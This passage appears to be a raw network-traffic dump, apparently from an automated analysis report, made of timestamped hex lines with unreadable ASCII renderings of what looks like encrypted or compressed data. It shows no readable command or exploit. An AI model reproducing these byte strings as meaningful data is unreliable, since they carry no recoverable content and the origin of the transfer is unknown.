                              Data Ascii: LGMif!B]b^Y0^`1SKcx=/MNbZ&fR*uK7u`iZ54/\S[Z+<Q/YoOF l=`,.R9d2?v)vfMQacyH]+hpGle>>])%QH1['a]&fXQxXRHvplScl
                              2021-11-23 11:22:36 UTC50INData Raw: 65 4c 0b be 92 96 20 f9 18 6a aa ba f3 fc 7e dd 39 50 c9 9f 58 a5 fb 69 09 fd 4a 11 46 e7 46 39 2e c1 e8 91 0f 39 47 50 5b 3e 98 cd bb ab 37 ec 40 50 c9 e9 0e 89 9a 77 19 85 f9 a4 3e bc 7d aa 74 f0 a9 05 fa c7 4b 1c 7f 15 9a 3e e5 2c 6c 33 8a 12 31 1a 55 af e4 cf e5 01 2f 09 12 f7 27 48 97 f6 ad bd 14 4c 41 23 43 69 b0 08 99 f2 20 5c ae b2 42 5a 0b a0 7a e4 04 f4 de f5 69 d7 82 20 02 88 5e d2 a0 f3 0f b1 87 a7 fd ba ac 5e 77 db 41 76 6c d9 02 3d 8b 36 fd 5a 08 b2 6e f9 b5 4c 3b 4d 29 59 a1 bd 60 3d 0a 5f 1b 4d a9 9a ab a5 49 1c 9a 44 9f 72 7b f0 2a 0d fb 77 d5 59 eb 3a 2c fd c5 74 0c 5c 59 93 3c f3 52 03 f7 8e 3e e2 5b 29 1d c2 9f 8b a4 4c 46 04 70 41 c4 16 8d 2e 66 25 06 cc 1b e0 6f 3c ae f7 a5 34 d8 16 2e 1e af 54 91 05 50 76 b5 b1 b1 d9 04 34 51 2f 75
                              Data Ascii: eL j~9PXiJFF9.9GP[>7@Pw>}tK>,l31U/'HLA#Ci \BZzi ^^wAvl=6ZnL;M)Y`=_MIDr{*wY:,t\Y<R>[)LFpA.f%o<4.TPv4Q/u
                              2021-11-23 11:22:36 UTC51INData Raw: a3 a7 5a 1a 31 24 ba 4d a2 49 4e 64 c1 06 22 15 02 d3 45 2b ad b3 ee cc 2a f1 1d 46 86 0c 1d fa 0b a5 88 28 26 52 6a 4a 04 0c 11 f3 63 f7 6a a2 21 89 17 05 76 04 17 4a dc a3 70 95 b6 44 3e 44 8d c4 ca 3d 70 2c a7 86 2e e6 bc d3 b4 f9 6b 6c 97 b0 34 02 04 24 28 06 34 78 6f a8 5b 8a d0 da f3 7b da 27 4d 25 7a 2c 07 59 c8 df 1d 49 14 30 0b fb d6 a5 ea c0 0b 5f d4 d4 f0 60 ce 9d 38 a8 6b 8c db e6 9e 89 b9 4b b9 7f 0d 83 58 e7 eb 80 74 c2 64 75 5b 69 1a c5 d9 c4 c3 16 ab 29 c4 c2 6c e1 c4 87 9a 27 20 c0 2e 8d d2 51 92 84 7c 0a 0c 87 ec 97 c4 22 dc 12 db 84 e7 b4 7d 03 4f 56 1f 02 03 9f 3a 0e 0e 9b 4e 90 36 80 a7 3d c8 5e d7 2f ad 92 73 e5 82 e6 82 f1 4c 7a 4c c7 56 fa 08 36 02 0c 63 bc da 3e e4 55 e9 73 4f 52 08 36 7a ce 8f bc 9d 0e f8 31 96 f8 97 f8 e5 34 85
                              Data Ascii: Z1$MINd"E+*F(&RjJcj!vJpD>D=p,.kl4$(4xo[{'M%z,YI0_`8kKXtdu[i)l' .Q|"}OV:N6=^/sLzLV6c>UsOR6z14
                              2021-11-23 11:22:36 UTC52INData Raw: 3a 42 69 80 16 84 be 20 47 b4 b2 42 41 10 90 72 ff d0 f5 de b5 04 d7 82 40 71 32 4f a1 10 f9 71 28 8d d9 cb b6 d2 c7 5f 03 48 65 6f b0 43 01 8b 32 df 60 0d b4 63 29 a3 65 fb 4e f7 4b ac 0e 57 3d 00 7d 94 49 af 9b 90 99 58 18 b8 a8 96 73 71 dd 53 37 f0 aa 7d 73 33 39 3d ff fa 8e 31 5c 53 8a 38 ea 35 9a 37 8d 34 e9 7a f0 12 d4 86 ae 57 8f 46 0e 1f 9c cb 07 8a a7 73 29 50 6c 1b e0 6f 3c 61 f6 a5 34 da 14 17 3d 82 53 9d 19 e2 22 b7 b1 bb dc 13 1a 55 f4 66 0f 9c 57 8a 17 dd 0f ed e4 72 77 92 ba 6c 8d 0c fa 16 96 61 1d 3e 78 6c 54 5a 7c b0 01 9e fc 5e 55 0a 70 f4 e6 22 b8 b2 7a e2 81 0c 34 2e e9 15 94 35 b4 d6 bc 56 09 54 d9 c3 ae 9e d5 89 a1 db 4c 19 e3 35 5d 1b a4 7f 36 fa f9 b1 56 5d 1a ec 61 b4 e8 9d 58 51 6e 05 8c 63 e5 14 c4 81 96 57 64 f5 d9 0b 5d 7d 39
                              Data Ascii: :Bi GBAr@q2Oq(_HeoC2`c)eNKW=}IXsqS7}s39=1\S8574zWFs)Plo<a4=S"UfWrwla>xlTZ|^Up"z4.5VTL5]6V]aXQncWd]}9
                              2021-11-23 11:22:36 UTC54INData Raw: 3d 00 71 22 dc 44 4f 01 26 40 be d7 a5 5c d6 91 77 29 d7 f0 66 db 8b 10 ec 6a 8c d1 f0 02 a1 ba 4a 77 78 25 1f 8c e6 e1 ef 47 c0 64 73 6a 5a 0b c1 e2 18 c5 16 a9 47 59 c2 02 eb e8 b3 9d 32 34 fd f3 61 d1 51 94 80 6f 3a b6 87 c0 94 fb 96 f6 f9 de 88 f8 b2 6e 2b 1a 52 00 02 eb 04 79 20 05 81 9e 8c 2f a3 59 3b c8 49 bd 1a a6 6c 74 cf 9b e6 fa 32 47 65 4c c5 59 95 de 33 1d 0d a7 76 08 cd 12 9a fb 5c 3d 27 33 36 65 c3 b0 b5 8c 15 88 11 68 f9 ba 92 99 de 99 95 46 30 03 25 7d 90 19 8c 70 61 6d 2d 7c de c5 e6 8d 1f d3 47 e5 07 30 8c 42 5a ea e0 c0 1c 4f bc 0e 74 65 2a 3b 32 ce 1b 1d 6d c0 bd f8 df 1d c1 a8 45 4b 92 58 b9 ee 7c 63 98 dc f6 38 03 98 ad f1 98 0b 33 9b e5 0a ad 21 e1 80 2e aa b3 d4 37 0d 70 5c 82 68 3a 3f 5f bb 41 ff f7 3f 63 c8 eb 8d 5b ed 3d 06 6f
                              Data Ascii: =q"DO&@\w)fjJwx%GdsjZGY24aQo:n+Ry /Y;Ilt2GeLY3v\='36ehF0%}pam-|G0BZOte*;2mEKX|c83!.7p\h:?_A?c[=o
                              2021-11-23 11:22:36 UTC55INData Raw: 3f c8 74 f5 0f cf 8a a9 7c 5f 46 1f 0d 92 d2 e8 86 11 71 3d 22 3f d2 e0 65 1e a0 cb d9 30 cb 11 20 01 91 41 97 1f 9f 00 95 4f b0 e3 18 23 4e e4 60 6a a9 53 a2 cb c1 2c f8 99 c0 67 80 af 0b 61 0d d6 04 e8 7d 0b a4 7e 60 4b 58 68 98 cb 8f e3 7e c4 b9 5d fe fd 5b bd 64 69 f4 8d 2c 36 3a c1 d8 85 2c 4c b8 22 5e 7a e4 ad d1 a4 94 d4 89 bb c9 55 1a f4 9b 14 0d 52 5c 43 d8 fb 9a 41 49 03 fb 68 47 fa 9d 4f 50 70 88 af 4d e6 0a c4 99 87 4c 67 ef ea 2b 5c 51 39 0e bc 31 58 cf d8 49 d1 2b 2a 16 ef 58 29 dc 5c 0b bb 25 f6 bb ad c7 54 c9 9b 3e 99 36 c8 d5 d1 65 a4 e3 cc 15 0e 97 31 02 24 42 63 d9 78 e7 5c c7 cb 0a 64 63 69 82 67 77 b8 f3 05 1a 62 12 8e b0 6d e7 2d ec 17 fb c0 f7 9d 1d 67 b4 77 67 89 15 65 8d 97 b8 46 2c 7f 58 3f f1 bd 7c 13 01 c2 a1 1a c0 e5 9e 34 ac
                              Data Ascii: ?t|_Fq="?e0 AO#N`jS,ga}~`KXh~][di,6:,L"^zUR\CAIhGOPpMLg+\Q91XI+*X)\%T>6e1$Bcx\dcigwbm-gwgeF,X?|4
                              2021-11-23 11:22:36 UTC56INData Raw: de b1 d0 6f 88 74 63 c2 9b f0 0f 31 57 6e 57 c4 c9 95 d0 33 1d 0d 85 67 99 dd ed 44 e7 41 26 59 19 26 ff ea 96 bd 9d 19 92 d4 68 f9 b1 ec c5 cf 89 88 4c bb 23 39 af 83 17 f2 86 70 64 a9 94 cd ca 09 79 f1 1d c8 d6 3e 0c 9d 52 ca 96 2e b3 a6 45 ab de 10 a2 12 3b 38 d7 c0 0e 60 fb aa c5 09 87 96 8d 4e 5a 80 4f 6f 74 45 aa 98 dc b6 21 d9 f7 e2 f0 98 01 36 9d 96 28 af 21 e7 93 3f bb b6 bb f8 0d 70 56 5b 58 14 2e 87 b2 2e d7 e0 3f 65 d9 e0 9c 5d 83 02 34 6a 89 90 dc 53 7b a9 3f af 6f 40 1c d1 91 9b 24 fd 36 12 82 b8 f5 d2 29 cf 28 39 f4 86 5a af ec 16 d8 2b 59 0b 89 f9 72 06 27 dc 17 64 fc 00 76 47 8d 27 4f dc b4 c4 0f d3 e3 a9 1e 01 d2 9c b9 77 7f 86 f9 a8 05 b7 0c 10 72 9f 65 08 d2 f5 95 12 50 e3 af 38 cf 2f 4b 1b f3 0e 31 10 8b af e2 e5 c5 1d 2f 09 d7 f5 21
                              Data Ascii: otc1WnW3gDA&Y&hL#9pdy>R.E;8`NZOotE!6(!?pV[X..?e]4jS{?o@$6)(9Z+Yr'dvG'OwreP8/K1/!
                              2021-11-23 11:22:36 UTC58INData Raw: 2e 5e ad db bd 9b df 9f 81 f8 44 08 e1 96 e1 7f c4 57 30 f0 f2 47 9a 5a 0b e4 58 51 c0 c1 5e 42 61 7b a7 49 06 11 d7 8d af b9 76 f0 f7 fd 00 7d 3f 23 a2 2a 4d f4 2c 4a c0 3f 1d ef 12 59 03 fe 10 1b ac f5 f6 ad bb f0 af d8 9b 29 a3 c5 35 d4 fb 44 87 70 cc 13 17 93 23 39 2a 46 72 cd 4f f1 a6 c6 e1 29 28 6d 78 89 ee 63 b6 c4 17 0d 70 14 b7 bd 76 ff d5 c5 66 f6 d1 fd b9 e8 6f 9c 5f 76 8c 0c 6a b6 ab b8 57 34 76 52 92 83 b3 6e 02 0f f9 aa 0f c9 f2 f5 36 4b 7a 4b b9 e2 2a ce a9 ba cc 89 37 32 35 35 b6 4d af 37 60 09 e5 02 33 19 3b 0a 57 2c c4 fa c6 ce 2c e6 12 7f ac 67 08 fd 64 85 9b 26 4f 93 7b 43 61 23 bd 0d 96 d6 bb 91 18 b0 62 3e 7c 17 1c 4e e8 b2 7e ea 53 44 e0 50 c7 bb fd 3d 7a fa 6a 98 78 74 8b d3 be f8 50 59 e4 0a 3e dc 0c 29 2a 39 1e 78 65 76 18 b8 fa
                              Data Ascii: .^DW0GZXQ^Ba{Iv}?#*M,J?Y)5Dp#9*FrO)(mxcpvfo_vjW4vRn6KzK*7255M7`3;W,,gd&O{Ca#b>|N~SDP=zjxtPY>)*9xev
                              2021-11-23 11:22:36 UTC59INData Raw: a8 e6 3e 77 8c f4 1f 39 03 92 25 e1 98 0b 2f 88 e2 1b a9 09 7d 80 2e a0 ac c4 19 e4 71 5c 4b 78 3c e5 81 60 5e d0 f3 38 4b 54 f1 8d 51 f3 36 1e 83 8e 81 c7 94 61 ff 44 77 7c 43 05 d1 bc bf ca fc 30 77 24 e5 f5 d4 2e f6 0a 57 e1 8d 56 b4 fb 11 19 ee 4c 0a 9e f8 6a 2f 27 3e 17 64 0b 39 e3 50 5b 3e 4c 13 af fd 2b ed 40 5e c9 d0 0e 89 9a 55 60 be f9 a2 1c 7b 7f ac 58 9f 6f 44 e6 cd 95 12 5a 3d ad 3e e5 26 61 61 b3 12 31 6a 8a af e2 f7 e4 1d 2f 13 12 f7 20 53 bb d3 ad b5 0f 4c 41 5c 43 69 91 0a 8f bc 36 3d 55 b3 42 51 0f cf 40 ec e2 e1 b1 fd 04 d7 88 3b 77 1a c2 d2 aa f3 59 44 86 a7 fd bb a1 eb 76 db 41 76 6f b6 2a 28 a3 1a d1 4d 0c a5 e5 f3 bc 64 fa 5d 21 4e 81 30 1e 59 00 77 83 ef b8 98 ac b5 70 d0 b3 75 95 63 77 c9 05 22 f4 aa 71 4c 66 3d 3d f9 ec f2 04 4d
                              Data Ascii: >w9%/}.q\Kx<`^8KTQ6aDw|C0w$.WVLj/'>d9P[>L+@^U`{XoDZ=>&aa1j/ SLA\Ci6=UBQ@;wYDvAvo*(Md]!N0Ywpucw"qLf==M
                              2021-11-23 11:22:36 UTC60INData Raw: a7 d3 66 bf ea 21 ec 71 12 95 8a ee ff d3 e7 28 f0 d8 d3 22 fa 67 b2 59 5a 8e 0a 7a b6 60 b9 57 34 48 e0 c1 f0 9b 7f 06 0f c2 53 1d c0 e5 d9 30 ac 79 4d 97 16 2d e6 84 92 50 83 58 10 24 32 b6 74 31 25 68 60 e9 2e 31 1f 2c 2b a3 2a ab d6 ec 52 2a f7 11 44 89 72 0e d3 25 ad 99 20 5f bd 44 4a 0e 3c aa f3 9d 19 b3 9c 1e 85 62 38 60 2c 38 66 d0 b8 68 1e 8c 1b 12 42 f6 9f 17 9a 7a f0 79 82 0d e6 a5 d1 b4 f5 6e 49 ca 0a 34 08 18 01 40 4d 16 7a 65 70 4a 84 eb d5 f1 2c d8 27 0a 7e 52 2e 05 5f d9 d7 55 4f 7b 14 6a fa d0 b4 5e d0 0f 77 c0 d5 f0 66 a1 bb 3a a8 6d 9d d3 ce db 8d b9 4d 18 54 0f 83 8a e1 fa 88 0e d7 65 75 4b b7 4f b7 e8 f6 c6 10 bc 21 d5 cb 2a b6 c6 96 8a 5b 0d fa db 8b c3 58 83 92 16 36 f0 86 c6 8f e5 1d db 3a df 89 fe a1 17 25 5c 53 06 19 f4 b6 55 02
                              Data Ascii: f!q("gYZz`W4HS0yM-PX$2t1%h`.1,+*R*Dr% _DJ<b8`,8fhBzynI4@MzepJ,'~R._UO{j^wf:mMTeuKO!*[X6:%\SU
                              2021-11-23 11:22:36 UTC61INData Raw: 1a fe 4d 45 ec f6 63 a1 9e 5f 4e 97 f4 b3 12 ca 5b a8 72 99 7e 08 fd a2 b3 10 5a 3b bc 33 cd 6f 65 1b b4 7d 1b 12 8b a9 e4 f4 e9 72 3a 08 12 fd ff 5d ae fc 9a b3 0e 46 52 2c 30 d3 80 08 8f b3 08 6a b4 b2 48 85 29 81 62 f3 36 e5 cf e4 14 c6 90 bf c6 0d 86 2c 55 06 60 24 90 71 e4 b0 c3 cb 66 cb 75 ee 97 58 d3 e2 9e 17 fd 7a 0a b2 62 e7 b3 17 41 4e 29 55 84 0e 58 3d 00 7d 59 4f af ba b1 8b 58 18 f3 41 9f 72 71 dd 2d 0b 35 aa 77 5b 36 3a 3d f9 4f e0 0c 5c 46 80 34 e2 40 2b 36 8c 3e e4 73 e3 4e c2 95 a3 e8 4c 46 0e c6 8c c5 16 92 3d 60 2c 34 50 1b e1 76 24 bb f5 5f 32 cb 11 bb 19 82 42 81 1d 8b 27 7a b1 b1 cf 15 23 40 ef 98 04 a1 54 b4 c0 c5 1c ed 8b d1 70 8d ba e6 9e 20 f3 04 e8 72 2e 32 6d 74 4c 4d 7a 89 dc 80 02 59 16 b4 60 f0 e5 39 4b b3 7a f3 9e 15 36 2e
                              Data Ascii: MEc_N[r~Z;3oe}r:]FR,0jH)b6,U`$qfuXzbAN)UX=}YOXArq-5w[6:=O\F4@+6>sNLF=`,4Pv$_2B'z#@Tp r.2mtLMzY`9Kz6.
                              2021-11-23 11:22:36 UTC63INData Raw: af 94 b6 87 62 3e ea 15 11 7a f0 69 7e e0 8d d8 2f 42 ff b3 58 3d 7a f0 e5 82 0c d0 94 a2 28 e2 7f 7e ed 2a 97 02 0e 2f 9c 2f 33 67 6f 56 e0 8c fa dd 45 6a dd 38 07 31 9c 2c 05 59 54 ce 43 56 18 2f 3b 66 c7 a2 49 cc 14 25 5e c5 f7 7f c0 bd ad a8 6b 8c 47 f7 9f 96 b6 54 0b e2 1c 84 93 f6 fd 1c 70 c5 7b 64 57 f5 0b c3 d5 e6 d0 8a be 2f db d1 14 7d d5 91 93 20 33 64 ca 8a cd 44 84 09 68 15 ed 90 e0 61 ec 0c de 8e cc 8f e1 b0 6e 9f 4f 54 1f 10 eb 02 07 01 18 98 b8 1d 29 8b b4 a4 d9 48 cd 2a b2 f0 63 ce 95 fb 83 bb 57 62 59 c8 45 66 08 34 02 1a bd 3d f6 32 ed d8 fc 4a 28 4c 28 b6 65 c2 9c 25 8c 18 e2 35 7e 65 aa fa d1 fe b9 60 9a 21 0b ae ba 84 0e bc 6e ec 75 a4 d4 c3 a9 84 63 e7 12 71 d6 b3 16 8b 5d 74 d9 67 b3 a6 4f 20 15 78 52 37 2d ae d5 c2 00 4d ca 3a d2
                              Data Ascii: b>zi~/BX=z(~*//3goVEj81,YTCV/;fI%^kGTp{dW/} 3dDhanOT)H*cWbYEf4=2J(L(e%5~e`!nucq]tgO xR7-M:
                              2021-11-23 11:22:36 UTC64INData Raw: 3c 8d 5d 65 4c 0a b8 ca e5 a5 7c 85 72 29 5f 83 0e 38 39 00 71 e8 fd a8 90 b2 03 49 01 ab 0b a3 72 71 d7 05 52 f4 aa 71 34 5b 3b 3d f3 4f f0 15 50 5b 93 25 f4 49 3b 0e 53 3c e4 73 f2 0d d3 85 39 62 44 7f c2 1d 8d c5 1f e8 8c 61 2c 24 43 08 f6 76 06 80 44 a7 32 cb 00 2c 08 90 c9 84 0a 84 0e b3 de 01 ce 15 38 55 f0 15 64 8c 51 a8 de d8 1e ee a3 9a 72 92 b6 77 2d 0d fa 07 ed 89 1d 28 8c 7e 4e 4e 52 c3 de 9d fa 37 88 b9 71 fe f8 a8 ab a4 84 f8 83 0e 0d 74 c5 c9 91 5a 00 b8 0e 5d 1d a0 ac c7 50 9f ae 8b ac e1 19 0c eb bd 85 be 7f 57 3a ee 07 9b 51 a4 0a 84 58 51 c0 c3 5a 42 61 19 1c 60 e5 18 c3 75 86 4b 8b f1 91 8a 64 6b 3d 25 b1 5d 66 de ca 4f d3 33 2f 85 04 59 05 d7 5e 01 bd e9 f3 83 e9 dc 47 dd 39 3e 91 3b 1e 88 f9 6c dc d2 dd 0f 1c b3 77 15 36 44 d0 da 7d
                              Data Ascii: <]eL|r)_89qIrqRq4[;=OP[%I;S<s9bDa,$CvD2,8UdQrw-(~NNR7qtZ]PW:QXQZBa`uKdk=%]fO3/Y^G9>;lw6D}
                              2021-11-23 11:22:36 UTC65INData Raw: 7e cc 49 df f4 c6 17 bc 2c cd 4c b5 f7 f5 bd 9a 3d ab 4f cc 57 c1 4f 81 9f 52 0b e3 82 d1 94 e5 1d d4 88 f5 e1 fa a7 7e 2b 7a 53 00 02 5f 8f 1c 11 d1 92 92 8c 23 9a aa 09 29 47 5c 87 b2 5d 45 df 99 eb 9c a9 f1 74 42 5a e4 ed c3 20 02 14 91 96 e9 23 e9 55 e1 45 26 59 92 1e 0f c6 9c bf b5 3b fd 2a 62 5b aa f6 d9 08 8a 94 8b 2d 1c e4 b8 8f 00 91 69 6f 55 78 b8 0e be 18 78 f3 04 43 c4 3c 26 9a 51 70 c1 55 b6 a6 4f ad 25 6e 6d 88 28 27 d5 d0 06 7c f3 c9 22 de 1d 8a 8f 54 5a 81 4c 91 6f 28 63 9e ca 31 3e 03 98 0c e4 8c 1f 0d 38 e5 0a a7 09 bb 80 2e a0 3f eb 31 0d 71 4f 53 78 28 28 1a 85 41 ff e3 17 db c8 f1 87 73 b6 26 36 60 98 57 40 69 7e c6 18 be 61 50 1e cd af 84 33 d5 1e 7f a8 bc e6 db 39 cd 2d 25 c3 85 5a a3 ee 16 de ec 5e 33 f3 ed 63 17 00 4c ef 9b 03 10
                              Data Ascii: ~I,L=OWOR~+zS_#)G\]EtBZ #UE&Y;*b[-ioUxxC<&QpUO%nm('|"TZLo(c1>8.?1qOSx((As&6`W@i~aP39-%Z^3cL
                              2021-11-23 11:22:36 UTC66INData Raw: 05 53 0f 36 b6 34 58 08 b4 b4 21 91 7d 37 a0 17 01 77 c4 a4 4d b1 9c 52 26 93 f1 84 e1 74 6b e0 6a b4 1a e9 9a f4 db d4 7a 61 e2 1b 3a 15 83 28 00 3e 35 6b 47 67 7b 9a eb ca 55 44 da 27 0d b3 6b 0e 11 71 66 df 44 43 3c 6a 68 fa dc 8d bc c0 0b 55 ea 00 f1 60 c4 b5 1c a8 6b 86 b4 ce 9a 89 bf 5a 60 69 db 90 9b f7 e5 97 ec c5 64 75 40 7a 3c d5 ec e2 d7 01 23 17 c4 c2 03 43 d5 b0 98 1c 8b f8 db 87 cd 71 1e aa 79 12 f3 90 e8 33 ec 0c d4 3e f2 99 f0 b0 f5 04 5e 53 01 1b de 8f 35 10 16 96 14 a2 29 8b b5 9a d9 6c c6 18 0a 6c 72 c3 95 9f 19 18 46 65 47 c2 7b 08 18 33 17 3d c1 42 09 cd fa 57 fe 5c 20 41 1e 0e e0 c0 9c b9 8c 10 d5 64 6c f9 bd 92 d7 df 99 95 b7 30 1a 3d 83 d3 15 9d 7e 1f 7d a2 cb eb 86 dc 72 e0 0d 43 d6 30 0e 5a 51 48 e8 f3 a5 95 1e ad 12 67 9b 01 23
                              Data Ascii: S64X!}7wMR&tkjza:(>5kGg{UD'kqfDC<jhU`kZ`idu@z<#Cqy3>^S5)llrFeG{3=BW\ Adl0=~}rC0ZQHg#
                              2021-11-23 11:22:36 UTC67INData Raw: c7 7f cd 5a 69 61 29 9b 34 05 85 fd 55 0b b2 62 e0 b0 75 f7 42 3d 4c 85 2f ee 8a 08 f9 30 7d 6d 99 36 16 4f c2 a5 a3 12 4d 71 dd 2c 18 f5 bd 7e d5 5c 2d e7 ea fc f2 01 77 4b 91 31 f3 57 3c ec 84 2f e9 e7 eb 0d cf 82 79 fb 2c d8 1f 12 9a 13 05 8a 2c 6d 3d 3f 61 f9 f1 60 9a 0f e2 7f 25 1d 9c 00 19 82 52 84 08 9b 0e b2 3f 06 d7 cf 21 54 e6 68 2e df 40 a7 dc d0 9b fa 8f d1 78 06 6a 0e b0 14 eb 0b e8 79 0d 3b 63 71 cb 6b 85 98 da 9d 2a 49 3e a9 7f 60 36 c8 81 a2 6b ff 83 05 34 2d d0 c7 03 24 b6 a8 00 c3 d3 c0 ab c0 a8 8f c0 0e 81 23 45 08 e1 93 3e 0d 7e 5d 18 de f9 9a 4d 50 1a ea 5e 82 fb 93 4f 4c 76 64 9f c9 3b 1d f2 a3 b0 5d 75 fa e2 da 75 45 3f 25 bb f0 44 da e0 49 81 25 35 08 11 59 05 d6 4b 1b ac f3 f5 a9 b2 d8 51 d9 9b 2f 84 2c 36 d4 e7 6c da 71 d7 25 07
                              Data Ascii: Zia)4UbuB=L/0}m6OMq,~\-wK1W</y,,m=?a`%R?!Th.@xjy;cqk*I>`6k4-$#E>~]MP^OLvd;]uuE?%DI%5YKQ/,6lq%
                              2021-11-23 11:22:36 UTC68INData Raw: 68 5c 56 63 4c d3 5d 59 68 1a ce db f2 d7 1e c0 0a c5 c2 08 f2 c0 e5 aa 35 25 f2 c8 84 c3 58 85 fa 50 13 f2 8c d1 97 fb 63 f4 13 dd 82 e1 bf f5 28 5e 53 01 1b f7 80 9b 2d 07 81 99 8e 2c 82 a5 32 c1 c1 65 18 84 6d 72 c3 9b e4 83 36 4c 6c c8 63 4d d2 01 32 1d 0d 8c b9 e8 23 e8 52 f3 65 2f 53 08 3c 74 cb 8d b3 f2 38 fc 2a 62 e8 b2 ec cb b1 b1 9e 9a 2b 1a 3b c4 a8 10 9d 72 7b 63 a0 dd e2 31 af 1d cc 0c 52 ca 3c 00 a4 51 51 f9 ed a2 a1 20 aa 05 7f 47 1e 33 38 1a d0 3a 43 dd ba d2 d5 0e 8b b4 6b 49 90 5e b3 c6 12 63 98 d6 62 39 05 b2 0d f0 d9 17 25 9b e5 0a ad 21 e1 80 2e aa 84 d5 31 0d 47 5d 41 69 2f 3f 96 ba 5b ff e2 3e 78 f8 f7 8d 3a ec 26 36 fa 8f 81 dc 31 1f c7 19 a7 62 4f 62 35 b8 97 2a ee 36 7f 80 dc f4 d4 25 cd 3c 47 e7 96 5f b3 ec 03 41 4a 25 ed 99 e9
                              Data Ascii: h\VcL]Yh5%XPc(^S-,2emr6LlcM2#Re/S<t8*b+;r{c1R<QQ G38:CkI^cb9%!.1G]Ai/?[>x:&61bOb5*6%<G_AJ%
                              2021-11-23 11:22:36 UTC70INData Raw: af 1a b7 b1 24 cf 15 23 35 4f 66 05 87 5b d1 36 df 0f e1 87 c8 5e ef b4 18 99 24 84 09 f9 71 34 a9 71 7f 59 38 86 99 da 97 93 a5 3b b8 7b fc c4 29 ae b2 7c d1 12 0f 25 2e e9 5e 94 35 b4 ca f2 56 09 54 c2 2c af 9e c4 92 81 b4 40 08 ed 93 6b 08 7e 51 18 6d fa 9a 41 29 f7 e5 49 5e 87 60 5f 42 6d 7e 86 1e e1 12 d1 a3 05 59 75 f6 d9 42 5e 7d 39 56 4d 2f 44 d6 a5 b4 c1 39 3f 00 39 da 01 d6 4b 33 28 f7 e5 ad 9a 4f 44 db 9d 5c 77 2d 36 de 92 91 db 70 c6 1d 2c 18 2e 11 30 6a f6 cf 67 ea 8a 43 e3 01 73 1e 84 8e fd 6e d0 11 08 09 7a 1a b7 24 76 ff d5 c5 bf f2 d1 fd 9d 7e 63 b4 77 07 70 0b 7c 94 ea 45 56 3e 6a 74 e9 78 95 6c 04 21 63 a7 1e c6 cb 66 1d ae 7f 38 43 f2 2c ec e1 47 cd 83 52 0c 3f 5a 4e 5d a6 2c 7f bc d2 12 20 1b 12 24 47 2b ab a2 3b cf 2a fd 13 46 88 0c
                              Data Ascii: $#5Of[6^$q4qY8;{)|%.^5VT,@k~QmA)I^`_Bm~YuB^}9VM/D9?9K3(OD\w-6p,.0jgCsnz$v~cwp|EV>jtxl!cf8C,GR?ZN], $G+;*F
                              2021-11-23 11:22:36 UTC71INData Raw: 62 0e f7 3d be ea b1 ec c4 cf 8a a1 c4 df f4 cd ad a9 11 9d 79 60 64 a3 cb e1 8a 19 bc e3 0f 5e da 2f 07 8d 51 60 ff e7 9c a4 4f bc 92 7f 4d 03 2d 21 cc fd 0a 69 ea ba d2 ce 15 99 62 44 67 99 49 be f8 35 74 04 c6 af 31 03 89 05 ef 8b f5 24 b7 ef 79 a9 23 e1 8a 22 b5 a7 c7 39 0d 61 54 5e 7c c4 3e ba b1 49 e7 8d 16 62 c8 fb 92 4d ff 2e 36 7b 87 9e df bc 7f ea 1e bc 6b 4b 12 d3 aa 9f 20 ec 38 60 56 bb d9 dd 3e d9 23 49 c2 1b 44 b6 f5 06 de f5 52 e5 99 c5 68 0f 94 ea e8 9b 02 02 78 49 48 3c 46 dc b5 c9 e2 ec 6c 5c f0 f9 15 95 00 42 5b 8e f9 b3 1e ba 6f 54 73 b3 65 14 fc da 43 01 5c 22 bc 2d ed 26 70 13 ad 1d cf 11 a7 f7 f3 e1 f5 1b 26 18 14 66 36 17 96 b6 a4 a2 08 dd 59 7d 58 0b e0 01 94 b8 b1 48 eb ab 20 3b 19 81 75 75 fe a9 c9 97 65 de 93 37 e0 2d 4e 8d bd
                              Data Ascii: b=y`d^/Q`OM-!ibDgI5t1$y#"9aT^|>IbM.6{kK 8`V>#IDRhxIH<Fl\B[oTseC\"-&p&f6Y}XH ;uue7-N
                              2021-11-23 11:22:36 UTC72INData Raw: 5a 8a 87 5b 66 f4 e0 d1 75 29 3b 25 b7 41 c3 dd ca 4f ed 3e 33 05 cc 24 04 d6 4d 0d bd f7 8a 23 b3 d8 41 cc 41 3c 84 3f 33 ec b1 6d da 70 dd 11 15 9e 3c 7e bf 43 72 cd 74 ea 8a 81 e6 01 7f 7c 7c 9e f8 73 d0 65 08 09 76 7d 07 a2 72 f5 c0 ea 33 de cf f8 b5 ff 76 b2 59 53 8c 0a 76 b6 aa b8 57 34 59 80 c1 f0 91 7d 05 21 ed a3 1e eb f0 f9 0f a6 40 a7 bf f3 2c f7 86 ae e4 1b 5c 1a 31 23 3d 5b a6 26 69 72 d5 14 1b bc 2a 03 4c 3f 83 06 c7 ce 2c e1 96 50 8c 63 09 ef 1f bb b1 85 49 95 60 62 92 36 bc 07 8d 0c 9c ba 31 87 64 2d 7f 15 1e 72 f8 2a 7a e0 8b 52 b3 42 e2 93 cb 29 6e e4 51 30 0b ce 81 c7 9c 29 7b 61 e2 1c b9 05 0e 2f 01 2a 20 6c 4d d5 59 8c f0 f5 45 7b da 2d 1f 1a 6b 24 11 71 50 db 44 4f 02 bd 6f fa d6 a4 42 d5 1f 77 61 d4 f0 6a da b5 ee ab 6b 8a cd 6b 9f
                              Data Ascii: Z[fu);%AO>3$M#AA<?3mp<~Crt||sev}r3vYSvW4Y}!@,\1#=[&ir*L?,PcI`b61d-r*zRB)nQ0){a/* lMYE{-k$qPDOoBwajkk
                              2021-11-23 11:22:36 UTC74INData Raw: e2 a3 72 c6 ee 9f 44 92 ba 27 64 90 92 d2 19 e2 d7 17 b2 7b 59 6f 5c a8 99 3f e8 2f 45 34 ab fb cb 39 fe ec 56 e1 87 c6 b4 f3 19 d8 dd b1 1b 98 e9 ff 00 17 de f0 bb d8 11 7f 50 c7 25 48 d2 a4 ca 78 71 51 5a fe e4 2c 2f 9c 5f 48 1a e8 ac 09 be 60 e1 ee 8e 61 1a e6 ed 46 12 5a 3d 31 2f eb 39 7c 04 e8 8e 20 1e 94 b1 f9 79 f5 13 30 16 0d a4 bd 59 85 d9 b2 a3 83 67 41 22 42 7a 8e 19 8b a8 00 ca b4 b2 42 c7 01 9e 64 fb ef 6a cf fb 1d c8 ea ad 60 3c 47 f2 64 f9 71 22 1b b6 f9 ac cd ba eb ca 45 7e 76 e4 b0 2d 85 2e ca 01 96 a3 66 e9 a3 23 67 5f 27 41 a9 df 60 3d 00 eb 96 43 b6 99 98 48 58 18 b2 e9 8e 7c 6e d7 32 05 6c bb 79 44 e0 1a bf f9 ed e1 90 4d 